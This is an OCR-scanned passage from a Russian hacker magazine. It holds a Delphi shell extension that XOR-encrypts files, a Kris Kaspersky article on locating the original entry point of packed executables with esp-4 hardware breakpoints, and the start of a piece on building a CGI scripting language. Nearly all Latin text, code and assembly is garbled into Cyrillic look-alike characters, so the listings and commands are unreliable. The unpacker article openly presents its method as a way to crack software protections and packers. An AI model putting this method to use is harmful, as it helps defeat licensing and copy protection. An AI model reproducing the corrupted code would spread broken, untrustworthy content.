чикдолжен быть инициализирован. Делает- 
ся это при помощи интерфейса ІЗИеІІЕхІіпіі, 
у которого только один метод ІпШаІіге. Сра- 
зу после инициализации происходит вызов 
ТСопіехіМепи.ОиегуСопІехіМепи (Мепи: 
НМЕШ; іпбехМепи, ібСтбЕігзІ, ісІСтсІІ_аз1:, 
иРІадз: ІІІІ\ІТ): НРезиІТ — он добавляет новый 
пункт в меню. Параметры этого метода оз- 



начают: 

■ Мепи — дескриптор системного меню. 

■ ІпбехМепи — номер строки меню, в кото- 
рую следует вставить пункт. 

■ ІбСтбРігзІ,ІсІСтсІІ_азі — диапазон до- 
пустимых значений для идентификаторов 
вставляемых пунктов меню. 

■ иРІадз — набор флагов. 

Далее идет вызов метода ТСопІехіМепи. 
ОеіСоттапбЗігіпд(ібСтб, иТуре: ІНІХІТ; 

рѵѵВезегѵесІ: РІІІКІТ; рзгЫате: 1_РЗТВ; ссИ- 
Мах: ІЛІХІТ): НВЕЗЮ. Этот метод предна- 
значен для получения подсказки для конк- 
ретной команды меню. Параметры: 

■ ісІСтсІ — идентификатор пункта меню, со- 
ответствующий ІбСтбРігзІ:. 

■иТуре запрашивает тип информации: 
ОСЗ_ѴЕРВ или ОСЗ_НЕІ_РТЕХТ. 

■ рѵѵВезегѵесІ забронирован. 

■ рзгІЧате определяет буфер-строку. 

■ ссНМах определяет размер буфера. 

Когда происходит нажатие нашего пункта, то 
вызывается СопІехіМепи.ІпѵокеСоттапб, 
в котором мы опишем, что должно проис- 
ходить. Параметром этого метода является 
лишь запись типа ТСМІпѵокеСоттапбІпІо. 
Вот поля записи: 

■сЬЗіге определяет размер структуры зігеоі 
(ТСМІпѵокеСоттапбІпІо)). 

■ ИѵѵпсІ определяетокно, которое будет вла- 
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Уникальные идентификаторы 

СТЛ О представляет некоторое 
128 -разрядное целое число, ис- 
пользуемое в технологии СОМ 
для уникальной идентификации 
интерфейсов. СОТО генериру- 
ется при помощи АРІ- функции 
СоСгеаі:еСІТГО( ), а алгоритм 
генерации нового СОТО осно- 
вывается на комбинации следую- 
щей информации: текущая дата 
и время, частота процессора, 
номер сетевой карты. Если на 
компьютере установлена сетевая 
карта, то сгенерированный на 
этом компьютере СОТО будет 
действительно уникальным, так 
как уникальность сетевой карты 
гарантируется встроенным в нее 
глобальным идентификатором 
( ГО ) . Если же на компьютере 
нет сетевой карты, то ее номер 
можно заменить другим, синте- 
зировав его с помощью парамет- 
ров другого установленного в 
компьютере оборудования. 



дѳльцѳм всех окон. 

■ ІМазк определяет, заданы или нет пара- 
метры бѵѵНоІкеу/Ьісоп. 

■ ІрѴегЬ определяет вызываемую команду. 

■ ІрРагатеІегз — параметры (опция). 

■ ІрЮігесІогу — рабочая папка (опция). 

■ пЗЬоѵѵ — флаг передаваемый ЬоѵѵѴѴіпсІоѵѵ 
(ЗѴѴ_*). 

■ бѵѵНоіКеу — горячая клавиша, ассоци- 
ированная с приложением после вызова 
(опция). 

■ Ысоп определяет иконку (опция). 

■ ЬМопіІог определяет монитор по умолча- 
нию (опция). 

Мы рассмотрели все методы двух интер- 
фейсов, необходимых нам непосредствен- 
но для создания СОМ-объекта, но, чтобы 
он заработал, нам нужно его еще зарегис- 
трировать. Для этого нужно создать такие 
значения в реестре: 

1 . Н К ЕУ_С І_АЗЗ ЕЗ_В О ОТ\С І_3 1 Э\{хххххххх- 
хххх-хххх-хххх-хххххххххххх} регистрирует 
наш СОМ-сервер. 

2. НКЕѴ_СІ_АЗЗЕЗ_ВООТѴ\зЬеІІех\СопІехІ 
МепиНапбІегз\СопІМепи\СІ_5Ю, вместо 
СІ_ЗЮ — наш номер. Эта запись указывает 
на то, какие типы файлов будет вызывать 
наш обработчик (в данном случае * — для 
любого файла). 

3. Н КЕѴ_І_ОСАІ__МАСНІ N Е\ЗоПѵѵаге\Міс- 
го-зоЙХѴѴі п б оѵѵз\С и г ге піѴе гз і о п\3 Не 1 1 
ЕхіепзіопзХАрргоѵесІ — это значение разре- 
шает использовать нашу ЭІ_І_ и погружает 
ее в ОЗУ сразу же после первого вызова. 

Шифруем 

Я не стал заморачиваться над описанием 
сложных криптоалгоритмов и решил, что 
отпимальнее всего будет просто заксорить 
файл. Алгоритм шифрующей процедуры 
в этом случае нарисовался такой: откры- 
ваем файл, считываем один байт, ксорим 



его и записываем на то же место. В итоге 
мы получим файл той же длины, с тем же 
названием, но другого содержания. Чтобы 
получить исходный файл, нам нужно прос- 
то проксорить его еще раз. Да, кстати, так 
как мы будем все это делать для нетипи- 
зированных файлов, то для записи/чтения 
нужно использовать процедуры ВІоскВеаб 
и ВІоскѴѴгіІе. Работать с ними не сложнее, 
чем с обычными функциями ввода/вывода. 
Смотри: 

Шифрующая процедура 
ргосебиге 5Ы(г (РРіІеЫате: зігіпд); 

// РРіІеЫате — это имя шифруемого файла 
ѵаг 
Р: Рііе; 

ВНеаЬ, ВѴѴгіДеп, ТоІаІВеаЬ : Іпіедег; 

ВіЛ: Вуіе; 

Ьедіп 

АззідпРіІеЩРРіІеЫаппе); 

Везе{(Р,1); //открываем для чтения/записи 
ігу 

ТоІаІРеасІ:=0; //количество прочитанных байт 
гереаі 

// считываем в ВіЛ 1 байт из Р 
ВІоскРеасІ(Р,Вир 1 , ВНеасІ); 
і( ВНеасІ > ОШеп 
Ьедіп 

// ставим указатель перед последним 
зеек(Р,То{аІВеасІ); // прочитанным байтом 
Вик=ВіТхог7; //ксорим и записываем байт 
ВІоскѴѴгі{е(Р,ВіД ВНеасІ, ВѴѴгіПеп); 

ВНеасІ о ВѴѴгіДеп Шеп 
гаізе Ехсер{іоп.Сгеа{е('Ошибка!') 
еізе Ьедіп 

ТоІаІНеа<±= ТоІаІНеасІ + ВНеасІ; 
епЬ; 
епЬ; 

ипІІІ ВНеасІ=0; 

ЛпаІІу 

СІозеРіІе(Р); 

епб; 

Реализуем все прочитанное 

Теперь мы разобрали все необходимое, по- 
этому я предлагаю открыть пример расши- 
рения контекстного меню из поставки ЭеІрЬі 



(ВогІапб\ЭеІрЬі7\Эетоз\АсІіѵеХ\ЗЬеІІЕх1:\ 
сопітепи.сірг) и отредактировать его. Для 
начала в СІазз_СопІехіМепи изменим зна- 
чение ТОІІЮ на любое другое. 

В ТСопІехіМепи.ОиегуСопГехМепи пункт 
ІпзегіМепи 'Сотрііе...' меняем на название 
нашего пункта, то есть «Зашифровать». 
Далее идет (ЗеіСотріІегРаіЬ. Эту функ- 
цию благополучно удаляем, и на ее место 
вставляем нашу — ЗЬіІг. Как известно, 
ТСопІехіМепи.ІпѵокеСоттапб выполня- 
ется после нажатия на наш пункт в меню, 
поэтому мы здесь напишем только ЗЬіІг 
(РРіІеЫате), а остальное удалим :). РНу, с 
ТСопІехМепи.ЭеіСоттапсІЗіппд тоже 
все ясно, так что оставляем без изменений. 
А вот ТСопІехіМепиРасЩгу.ирбаІеРіедізІгу 
нужно подправить: просто меняем все 
пути в реестре на свои. Вот и все, делать 
больше нечего... Теперь компилируем и 
получившуюся Э[_І_ кидаем, например, вС:\ 
ѴѴІІ\ЮОѴѴЗ\зузІет32. А что дальше? А даль- 
ше запускаем стсі, набираем Ведзѵг32 
С:\ѴѴІМЭОѴѴЗ\зуз{ет32\СопіМепи.сІІІ — и 
наше расширение готово к работе! Для 
того чтобы отменить регистрацию, доста- 
точно выполнить Ведзѵг32 /и С:\ѴѴІІ\ЮОѴѴЗ\ 
з у з 1: е гл 3 2\С о п 1 М е п и . б 1 1 . 

Открываем любую папку, щелкаем по лю- 
бому файлу и любуемся новым пунктом 
в меню! 

Вот таким несложным образом можно до- 
бавить свой пункт в любой тип файлов. А 
если хочется и иконку добавить рядом с 
пунктом (как у ѴѴІІЧВАВ), то для этого нужно 
использовать не только ІСопІехіМепи, но и 
ІСопІехіМепиЗ. =н= 
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КРИС КАСПЕРСКИ 



СосІіпд/ А5м 

Универсальный 



распаковщик 

Разработка универсального распковщика : алгоритм 



Самый банальный взлом какой-нибудь программы происходит по принципу: скачал рас- 
паковщик, распаковал, взломал. Однако разработчики нѳ совсем дебилы и в состоянии 
предсказать подобный ход событий. Именно поэтому они стараются использовать такие 
защиты и упаковщики, под которые еще не написан соответсвующий крэкерский софт. 
Спасают хакеров универсальные утилиты. 



ОБОБЩИВ СВОИ ОПЫТ БОРЬБЫ С УПАКОВЩИКА- 
МИ, КРИС ПРЕДЛАГАЕТ АЛГОРИТМ УНИВЕРСАЛЬНО- 
ГО РАСПАКОВЩИКА, ПРОБИВАЮЩЕГО 99% ЗАЩИТ. 




В поисках ОЕР 

Создание универсального распаковщика 
начинается с алгоритма определения ОЕР 
(ОгідіпаІ Епігу Роіпі — Исходная Точка Вхо- 
да), отслеживающего момент завершения 
распаковки с последующей передачей уп- 
равления «программе-носителю». Это са- 
мая сложная часть универсальных распа- 
ковщиков, поскольку определить исходную 
точку входа в общем случае невозможно. 
Вот и приходится прибегать к различным 
ухищрениям. 

Чаще всего для этого используется пошаго- 
вая трассировка, которой упаковщик/про- 
тектор чаще всего легко противостоит. 
Проблему не решают и трассеры нулевого 
кольца. Справиться с ними с прикладного 
уровня (а большинство упаковщиков/про- 
текторов работают именно на нем) прак- 
тически невозможно, однако разработка 
подобного трассера зачастую оказывается 
непосильной задачей для начинающих. 

И хотя в распоряжении автора имеются ис- 
ходные тексты великолепного трассера, 
разработанного группой Володи с ѴѴАЗМ'а, 
я решил пойти другим путем, ограничившись 
только аппаратными точками останова, для 



установки которых прибегать к написанию 
драйвера совершенно не обязательно. В 
«Записках мыщъха», электронную копию 
которых можно свободно утянуть с іір :// 
пегиті.ога.ги . показано, как сделать это с 
прикладного уровня, даже без прав адми- 
нистратора! На первом этапе в качестве ос- 
новного экспериментального средства мы 
будем использовать «Блокнот», пожатый 
различными упаковщиками, и знаменитый 
отладчик ЗоШСЕ. 

Дамп живой программы 

Самый простой (и самый популярный) спо- 
соб борьбы с упаковщиками — снятие дам- 
па после завершения распаковки. Дождав- 
шись появления главного окна программы, 
хакер сбрасывает ее дамп, преобразуя его 
в исполняемый файл. Иногда он работает, 
иногда — нет. Попробуем разобраться по- 
чему. Возьмем классическое приложение 
«Блокнот» из поставки І\ІТ и попробуем снять 
дамп с помощью одного из двух лучших дам- 
перов: Ргос Эитр или і_огсі РЕ Эеіихе. 
Процесс проходит успешно, и образовав- 
шийся файл как бы даже запускается, но. . . 
оказывается не вполне работоспособным: 



исчез заголовок окна и все текстовые сооб- 
щения в диалогах! Если мы не сумели сдам- 
пить «Блокнот» , то с настоящими защитами 
нам и вовсе не справиться. Давай попробу- 
ем разобраться почему. 

Расследование показывает, что исчезнув- 
шие текстовые строки хранятся в секции 
ресурсов и поэтому обрабатываются функ- 
цией БоасІЗігіпд. Загружаем оригинальный 
поіераб.ехе в ЮА Рго и находим цикл, счи- 
тывающий строки посредством функции 
БоабЗігіпдѴѴ (суффикс 'ѴѴ' означает, что мы 
имеем дело с уникодовыми строками). 

Ага, вот он! Рассмотрим его повниматель- 
нее. Я уверяю: тут есть чему поучиться: 

Хитро оптимизированный цикл чтения строко- 
вых ресурсов 

01 0048251л тоѵ еЬр, бз:І_оасІ5ігіпдѴѴ 

; еЬр — указатель на БоасІЗігіпдѴѴ 
0100482ВН тоѵесіі, оЯз* о(М 0080С0 

; указатель на таблицу ресурсов 
01004830Н 

01004830Н Іос_1 004830: 

01 0048305 тоѵеах, [ебі] 

; грузим очередной указатель на иЮ в еах 
01 0048325 ризІіеЬх 

; пВи^егМах (максимальная длина буфера) 

01 0048335 ризіпезі 
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/2/ ІЧоІерабе 

нормально работающий «Блокнот» 
(сверху) и тот же самый «Блокнот» 
после снятия дампа — все текстовые 
строки исчезли 



; ІрВиІТег (указатель на буфер) 

01 0048345 риз5 бѵѵогб ріг [еах] 

; передаем извлеченный иЮ функции 
01 004836И ризИ [езр+ОСИ+МпзІапсе] 

; Мпзіапсе 

01 00483А5 саІІ еЬр ; БоабЗігіпдѴѴ 

; считываем очередную строку из ресурса 
0100483С5 тоѵесх, [есіі] 

; грузим тотже самый иЮ в есх 
01 00483ЕІЛ іпсеах 

; увеличиваем длину считанной строки на 1 
01 00483РИ стр еах, еЬх 

; строка влезает в буфер? 

0 100484 ІИ тоѵ [есх], езі 

; сохраняем указатель на буфер поверх 
; старого иЮ (он больше не понадобится) 
010048435 Іеаезі, [езі+еах*2] 

; позиция для следующей строки в буфере 
010048465 \д з5оИ Іос_1 00488В 

; если буфер кончился, то это облом 
010048485 абб ебі, 4 

; переходим к следующему иЮ 
0100484В5 зиЬеЬх, еах 

; уменьшаем свободное место в буфере 
0 1 00484Б5 от р еб і , о^зі оГГ_1 008 1 50 

; конец таблицы ресурсов? 

010048535, \\ зЬоП Іос_1 004830 

; мотаем цикл, пока ресурсы не закончились 

В переводе на русский, это звучит так: 
«Блокнот берет очередной идентификатор 
строки из таблицы ресурсов, загружает 
строку, размещая ее в локальном буфере, и 
сохраняет полученный указатель на строку 
поверх. . . самого идентификатора, который 
уже не нужен!» Классический трюк с пов- 
торным использованием освободившихся 
переменных, известных еще со времен пер- 
вых РОР, если не раньше. А вы все МісгозоЙ 
ругаете! «Блокнот» писал неглупый хакер, 
бережно относящийся к системным ресур- 
сам и, в частности, к памяти. Для нас же это 
в первую очередь означает, что снятый с «жи- 
вой» программы дамп будет неполноцен- 
ным. Вместо реальных идентификаторов 



строк в секции ресурсов содержатся указа- 
тели на память, указывающие в «космос»! 
Ведь при повторном запуске «Блокнота» 
листинг 1 уже не срабатывает. 

Во многих программах встречается конс- 
трукции вида: 

«зашита» от дампингаживых программ 
ѵоіб *р=0; 

//глобальная переменная 
іі ( ! р) р = таІІос(ВиРР_ЗІ2Е); 

Очевидно, если сдампить программу после 
завершения строки с «іТ» , то глобальная 
переменная р будет содержать указатель, 
доставшийся ей в «наследство» от преды- 
дущего запуска, однако соответствующий 
регион памяти выделен не будет, и програм- 
ма либо рухнет, либо залезет в чужие дан- 
ные, устроив там настоящий переполох! 
Сформулируем главное правило: дампить 
программу можно только в точке входа! 
Остается разобраться, как эту точку входа 
отловить. 

Универсальный пример поиска ОЕР 

Вот мы и подобрались к самому интерес- 
ному и универсальному способу опреде- 
ления ОЕР, который к тому же легко авто- 
матизировать. Упаковщик (даже если он не 
совсем корректный) просто обязан после 
распаковки восстановить стек, в смысле 
вернуть регистр ЕЗР на место, под кото- 
рым будет первичный фильтр структурных 
исключений, установленный системой по 
умолчанию. Некоторые упаковщики еще 
восстанавливают и регистры, но делать это 
в общем-то и не обязательно. 

Возьмем, к примеру, тот же АЗРаск и пос- 
мотрим в его начало: 



Точка входа в распаковщик АЗРаск 
:иеір 

01010001 РБІЗНАО 

01010002 САШ0101000А 

01010007 ЛѴІР 465Е04Р7 

0101000С РБІЗНЕВР 

ОЮЮООБ НЕТ 

Замечательно! Первая же команда сохра- 
няет все регистры в стеке. Очевидно, что 
непосредственно перед передачей управ- 
ления на ОЕР они будут восстановлены ко- 
мандой РОРА, выполнение которой очень 
легко отследить, установив точку останова 
на двойное слово, лежащее выше верхуш- 
ки стека: «Ьртезр-4». 

Результат превосходит все ожидания: 



Передача управления на ОЕР 
010103АР РОРАй 

; на этой команде отладчик всплывает 
010103В0 ЛМ2010103ВА 

010103В2 МОѴ ЕАХ, 00000001 

010103В7 РЕТ0000С 

010103ВА РЦІЗН 1006420 

; передача управления на ОЕР 
010103ВР НЕТ 

Распаковав программу, АЗРаск заботливо 
выталкивает сохраненные регистры из сте- 
ка, вызывая всплытие отладчика, и мы ви- 
дим тривиальный код, передающий управ- 
ление на ОЕР «классическим» способом 
через РІІЗРІ оіізеі ОЕР/РЕТ. Поиск исход- 
ной точки входа не занял и десятка секунд! 
Ну разве не красота? Атеперь возьмем ІІРХ 
и проверим, удастся ли нам провернуть этот 
трюк и над ним? Ведь мы же претендуем на 
универсальный пример! 

Так начинается ЦРХ 
01011710 РБІЗНАО 
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Что делать, если отладчик про- 
скакивает в распаковщике точ- 
ку входа? Берем исполняемый 
файл, загружаем его в ЫиМе^а 
8 оМСЕ 8ушЬо1 ЪоасІег, убе- 
дившись, что горячая лампочка 
опции «8іаП: аТ \УіпМаіп, Маіп, 
ЭИМаіп» активирована, но при 
попытке загрузки программы 
8 оМСЕ проскакивает точку 
входа, полностью теряя управ- 
ление и контроль. Это извест- 
ный глюк 80 МСЕ, с которым 
постоянно борются. Вот 
только один способ: загружаем 
(исправленную) программу в 
1 ііе\ѵ, переходим в Ьех-режим, 
жмем <Е 8 > и вычисляем адрес 
точки входа путем сложения 
Епіхуроіпі: КѴА (в нашем 
случае — 10001) с Іта^е Вазе 
(в нашем случае — 1000000 ). 
Получается 1010001. Если 
считать лень, то можно прос- 
то нажать <Е5>, чтобы 1ііе\ѵ 
перенес нас в точку входа, 
сообщив ее адрес (однако это 
не срабатывает на некоторых 
защищенных файлах с иска- 
женной структурой заголовка). 
ОК, адрес ЕР получен. Вызы- 
ваем 80 ЙІСЕ путем нажатия 
на <Сіх 1 - 0 > и устанавливаем 
точку останова на любую АРІ- 



; <- упаковщик сохраняет регистры 
01011711 МОѴЕЗІ.ОЮООООО 

01011716 І_ЕА ЕОЦЕЗІ+ЕЕЕЕ4000] 

0101 1710 РЕІЗН ЕОІ 

Вот он, уже знакомый нам РЕІЗНАЭ, сохра- 
няющий все регистры в стеке и восстанав- 
ливающий их непосредственно перед пе- 
редачей управления на ОЕР. Даем команду 
«Ьрт езр-4» и выходим из отладчика, пока 
он не всплывет. 



Так ЦРХ передает управление на ОЕР 

0101 185Е РОРАй 

0101 185Е ЛѴІР 01006420 



А вот и отличия! Передача управления осу- 
ществляется командой ЛѴІР 1006420И, где 
1006420И — исходная точка входа. Похоже, 
что все упаковщики работают по одному и 
тому же алгоритму и ломаются, как в ночь пе- 
ред исходом. Но не будем спешить. Возьмем 
РЕ-сотрас* и проверим на нем. 



Точка входа в файл, упакованный РЕ-сотрасі 
01001000 МОѴ ЕАХ.0101 1974 

01001005 РЕІЗН ЕАХ 

01001006 РЕІЗН ОѴѴОРО РТР Е3:[0] 

ОЮОЮОО МОѴ Е5:[0],ЕЗР 



Плохо дело! РЕ-сотрасІ никаких регис- 
тров вообще не сохраняет, а РЕІЗН ЕАХ 
используется только затем, чтобы устано- 
вить свой обработчик структурных исклю- 
чений. Тем не менее, на момент заверше- 
ния распаковки указатель стека должен 
быть восстановлен, следовательно, точка 
останова на «Ьрт езр-4» все-таки может 
сработать. 

Первое срабатывание точки останова на езр-4 
77Е8АЕ78 РЕІЗН ОѴѴОРО РТР [ЕВХ+04] 

77Е8АЕ7В ЬЕА ЕАХ, [ЕВР-1 0] 

77Е8АЕ7Е РЕІЗН ЕАХ 



Так, ну это срабатывание явно левое (судя 
по ЕІР 77Р8АР78И, мы находимся где-то внут- 
ри КЕВІ4ЕЕ32.0ЕЕ, использующего стек для 
нужд производственной необходимости), 
давим <СігІ-0>, не желая здесь больше за- 
держиваться. 



Кузьмич?! Г де это я? 

0101 19А6 РЕІЗН ЕВР 

0101 19А7 РЕІЗН ЕВХ 

0101 19А8 РЕІЗН ЕСХ 

0101 19А9 РЕІЗН ЕОІ 



Следующее всплытие отладчика также не 
проясняет ситуацию. Ясно только одно: 
в стек сохраняется регистр ЕВР вместе с 
другими регистрами. Давим <СігІ-0> и ждем 
дальше. 

Переход на ОЕР 
:и еір-1 

0101 1А35 РОРЕВР 

0101 1А36 ОМР ЕАХ (010064205) 

А вот на этот раз нам повезло! Регистр ЕВР 
выталкивается изстека, и вследза этим осу- 
ществляется переход на ОЕР посредством 
команды ОМР ЕАХ. Все идет хорошо, вот 
только ложные срабатывания напрягают. С 
автоматизацией в этом плане значительно 
сложнее: у компьютера с интуицией сплош- 
ной напряг. А ведь пока мы всего лишь раз- 
влекаемся... Про борьбу с протекторами 
речь еще не идет. 

Возьмем более серьезный упаковщик 
РЗО 2.0 Ьу Ьагі/хі ( ЬДрѴМгеете.ргѵ.рІ/. 
ЬДр://ѵѵ\А/ѵѵ.ѵѵазт.ги/Ьаіхабо.рЬр?тобе= 
1ооІ&ісІ=345 ) и начнем его пытать. 



Разочаровываешься с первых же команд. 
РЗО переназначен для регистра РЗР, и хотя 
через некоторое время восстанавливает 
его вновь, но особой радости нам это не 
доставляет. Упаковщик очень интенсивно 
использует стек, поэтому точка останова 
на «Ьрт езр-4» выдает миллион ложных 
срабатываний, причем большинство из них 
находится в цикле. 

Фрагмент кода, генерирующий ложные сраба- 
тывания точки останова 
010001С1 РОРЕЗІ 

01 0001 С2 ЬООЗО 

01 0001 СЗ ХОРЮ ЕАХ, ЕОІ 

01 0001 С4 ЬООЗО 

01 0001 С5 РЕІЗН ЕАХ 

01 0001 С6 САШ [ЕВХ+10] 

Необходимо ввести какое-то дополнитель- 
ноеусловие (ксчастью, ЗойІСЕ поддержива- 
ет условные точки останова!), автоматичес- 
ки отсеивающее ложные срабатывания или 
хотя бы их часть. Давайте подумаем! Если 
стартовый код упакованной программы 
начинается со стандартного пролога типа 
РЕІЗН ЕВР/МОѴ ЕВР,ЕЗР, то точка останова 
«Ьрт езр4 іі *(езр)= = ЕВР» отсеет кучу му- 
сора, но при этом она будет срабатывать на 
любом стандартном прологе нулевого уров- 
ня вложенности. Упакованная программа 
может иметь оптимизированный пролог, в 
котором регистр ЕВР не используется. 

А вот другая идея. Допустим, управление 
на ОЕР передается через РЕІЗН оТСзеІ ОЕР/ 
ВЕТЫ, тогда на вершине стека окажется 
адрес возврата, что опять-таки легко за- 
программировать в условной точке оста- 
нова. Еще управление может передаваться 
через МОѴ ЕАХ,оІІзе1 ОЕР/ЛѴІР ЕАХ. Это 
легко проконтролировать, но вот против 
«прямых» команд ОМР оТТзеЕ ОЕР или ШР 
[ОЕР] мы бессильны. Ложные срабатыва- 
ния здесь неизбежны! Попробуй повоевать 
с РЗО. В какой-то момент кажется, что ре- 
шения нет, но это не совсем так! Все извес- 
тные мыщъху упаковщики и значительная 
часть протекторов, не желая перемешивать 
себя с кодом упаковываемой программы, 
располагаются в отдельной секции (или не 
секции), размещенной либо перед упако- 
вываемой программой, либо после нее! Код 
упаковщика сосредоточен в одном опреде- 
ленном месте и никогда не пересекается с 
кодом распаковываемой программы ! Вроде 
бы очевидный факт. Сколько раз мы прохо- 
дили мимо него, даже не задумываясь, что 
он полностью позволяет автоматизировать 
процесс поиска ОЕР! Посмотрим на карту 
памяти еще раз: 



Многообещающая точка входа в упаковщике 
ЕЗС 

01000154 ХСНС Е5Р,[010185В4] 

01 0001 5А РОРАЭ 

0100015В ХСНС ЕАХ.ЕЗР 

01 0001 5С РЕІЗН ЕВР 

01000150 МОѴЗВ 



Две секции упакованной программы 
МАР32 

ІМОТЕРАОДзд 0001 001 ВЮ1001000 00010000 
СООЕ ВѴѴ 

ІМОТЕРАОДзд 0002 001 В:0101 1000 00008000 
СООЕ ВѴѴ 
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В следующей статье цикла мы рассмотрим 
ѵжѳ разработку дампѳра и, собственно, 
самого универсального распаквощика. 




Мы видим две секции, принадлежащие 
упакованной программе. Непонятно, какая 
из них — секция кода, а какая — данных, 
тем более что должна быть еще одна сек- 
ция — секция ресурсов, но коварный упа- 
ковщик каким-то образом скомбинировал 
их друг с другом, впрочем код самого упа- 
ковщика, как мы уже видели, сосредото- 
чен в пространстве ІОООІххИ и отдельной 
секции для себя создавать не стал. Чтобы 
отсеять лишние всплытия отладчика, мы 
сосредоточимся на диапазоне адресов, 
принадлежащих упакованной программе, 
то есть от начала первой секции до конца 
последней, автоматически контролируя 
значение регистра ЕІР на каждом срабаты- 
вании точки останова. В данном случае это 
выглядит так: 

«Магическая» последовательность, приводя- 
щая нас кОЕР 

Ьрпл езр-4 \\ еір >= 0x1001000 && еір < 
0x1011000 

Невероятно, но после продолжительно- 
го молчания (а он и будет молчать, ведь 
стек используется распаковщиком очень 



интенсивно) отладчик неожиданно всплы- 
вает непосредственно в ОЕР! Отсюда на- 
чинается распакованный код исходной 
программы: 



01006420 

01006421 

01006423 

01006425 

0100642А 

0100642Р 

01006435 

01006436 



РЕІЗНЕВР 
МОѴ ЕВР.ЕЗР 
РЦІЗНРР 
РІІ5Н 1001888 
РІІ5Н 1006500 
МОѴ ЕАХ,Р5:[0] 
РЕІЗН ЕАХ 
МОѴ Р5:[0],ЕЗР 



Фантастика! ! ! А ведь РЗО далеко не самый 
слабый упаковщик — фактически граничит 
с протекторами. Однако методика поиска 
ОЕР во всех случаяхтаже самая. Выделяем 
секции, принадлежащие упакованной про- 
грамме, и устанавливаем точку останова на 
езр-4 в их границах. Даже если стартовый 
код использует оптимизированный пролог, 
первый же регистр вызовет срабатывание 
отладчика. РІичего страшного не случится, 
если мы не попадем в саму ОЕР, так как 
найти начало оптимизированного пролога 
можно и автоматом! 



Таким образом, мы получаем в свои руки 
мощное оружие многоцелевого действия, 
которое легко реализовать в виде плагина к 
І_огсІРЕ, ЮА Рго или самостоятельной утили- 
ты, о которой мы еще поговорим в будущем. 

Заключение 

Вот мы и научились находить ОЕР. Остается 
самая малость — сбросить дамп програм- 
мы на диск. Но здесь не все так просто, 
как может показаться сначала, и многие 
упаковщики/проекторы этому всячески со- 
противляются. В следующей статье этого 
цикла мы покажем, как реализовать уни- 
версальный дампер, распаковывающий, в 
том числе и ОН, и обходящий продвинутый 
механизм динамической шифровки, извес- 
тный под именем СоруМеплІІ, — это когда 
вся программа зашифрована, и отдельные 
страницы памяти расшифровываются не- 
посредственно перед их употреблением, а 
потом зашифровываются вновь. Также мы 
коснемся вопросов восстановления таб- 
лицы импорта. В итоге получится нехилый 
универсальный распаковщик, обходящий 
своих конкурентов, з: 
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РНР 



Сѳсііпд/ 

Пишем сво 



Разрабатываем собственный язык\л/еЬ-сце 




зенныиязык\л/еі: 

5*ор г 1Е 
I РА'*Т 
А^А'К 




РЕПІ_, РѴТНОКІ, РНР, 

АЗР — ЯЗЫКОВ ДЛЯ 
ВЕБ-КОДИНГА СЕЙЧАС 
НАВАЛОМ, И ВСЕ ОЧЕНЬ 
АКТИВНО ИМИ ПОЛЬЗУ- 
ЮТСЯ. ЕЩЕ БЫ: ДИНА- 
МИЧЕСКИЙ КОНТЕНТ, 
УДОБНОЕ УПРАВЛЕНИЕ 
САЙТОМ, ФОРУМЫ, «ГО- 
ЛОСОВАЛКИ», ДВИЖКИ 
ВСЯКИЕ. В ОБЩЕМ, ОД- 
НИМ СТАТИЧНЫМ НТМБ 
ДЛЯ СОЗДАНИЯ САЙ- 
ТА УЖЕ ОЧЕНЬ ДАВНО 
НИКТО НЕ ОБХОДИТСЯ. 
ТИПИЧНЫЕ ОШИБКИ, 
ПОЯВЛЯЮЩИЕСЯ ИЗО 
ДНЯ В ДЕНЬ В СКРИПТАХ 
НА ЭТИХ ЯЗЫКАХ ЧУТЬ ЛИ 
НЕ СТАНДАРТИЗИРОВА- 
НЫ. ЧУВСТВУЕШЬ ОПАС- 
НОСТЬ СИТУАЦИИ? 



Чтобы сайт было действительно сложно 
сломать, он либо должен быть написан на 
обычном НТМІ_, без всяких динамических 
наворотов, либо должен использовать свой 
собственный язык сценариев, еще неиз- 
вестный взломщику. А если учесть, что без 
динамического контента сейчас не жизнь, 
тоунас один выход — написать свой личный 
скриптовой язык и воспользоваться им при 
разработке сайта. 

Интерпретатор ѵѵеЬ-языка может работать 
как сді-приложение или как модуль ѵѵеЬ- 
сервера. Типичный модуль — это РНР. Ти- 
пичные же представители сді-языков — это 
РегІ или Руійоп. Ты, наверное, замечал, что 
скрипты для них помещены в отдельную 
папку (чаще всего сді-Ьіп), а первая их стро- 
ка представляет собой что-нибудь вроде 
#!/изг/Ьіп/регІ. Если залезть в директорию 
/изг/Ып/, то можно обнаружить там файл регІ 
(регі.ехе в ѴѴіпбоѵѵз) — это интерпретатор 
языка РегІ. ѴѴеЬ-сервер должен запустить 
его стакими параметрами, чтобы интерпре- 
татор понял, что ему нужно интерпретиро- 
вать. Давай посмотрим, с какими. Для этого 
создавай в Си консольное приложение и 
вбивай туда следующий код: 

#іпсІисІе <іо5{геат> 

#іпсІисІе <зісіііЬ.Н> 

//подключаем нужные хидеры 
изіпд патезрасезЩ; 

// пространство имен 

іпі таіп(іпі агдс, сНаг *агдѵ[]) 

{ 



Ьг(іпіі = 0; і < агдс; ++і) 

{ 

ргіпЩагдѵр]); 

//выводим переданный аргумент 
ргіпІІС'50"): 

// переходим на следующую строку 

} 

геШгпО; 

} 

Эта небольшая программка просто выво- 
дит каждый аргумент, с которым она была 
запущена. Нам очень важно разобраться, 
как же работают сді-интерпретаторы, так 
как Арасйе будет запускать ее вовсе не на 
наших глазах. Компилируем код и сохраня- 
ем получившийся файл в /изг/Ып/іезІ.ехе. 
Далее создаем файл /Ііоте/ІосаІІіозѴсді- 
Ып/Іезі.ізі (я использовал расширение Ізі, 
хотя ты можешь использовать любое — хоть 
обычное сді) со следующим содержанием: 

#! /изг/Ып Дез! 

// адрес нашего интерпретатора 
ргіпі "СопіепНуре: ІехѴЫтІ\п\п"; 

//тип возвращаемого результата 

Открываем браузер и заходим по адресу: 
ИДр://ІосаІІіоз1/саі-ЫпДезиз1 . На экране мы 
увидим, что наша программа запускалась 
с двумя аргументами: /изг/Ып/ІезІ и /йоте/ 
І-ОСАиЧ-І/сді-ЫпАезі.ізі. Несложно по- 
нять, что первый является адресом интер- 
претатора, а второй — адресом скрипта 
на сервере, который мы открывали брау- 
зером. Многое стало ясно. Оказалось, что 
переменная агдѵ[1] в Си будет содержать 
имя интерпретируемого файла. 
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В примерах я использую /изг/Ып/, хотя на 
самом дѳлѳ адрес у меня такой: к:/изг/ 
Ып/. Просто АрасИе собран так, как будто 
это /изг/Ып/. 



Пишем основу 

Теперь, какты уже догадался, нам нужносчи- 
тать все из этого файла (нашего исходника) 
для последующего анализа. Для этого вос- 
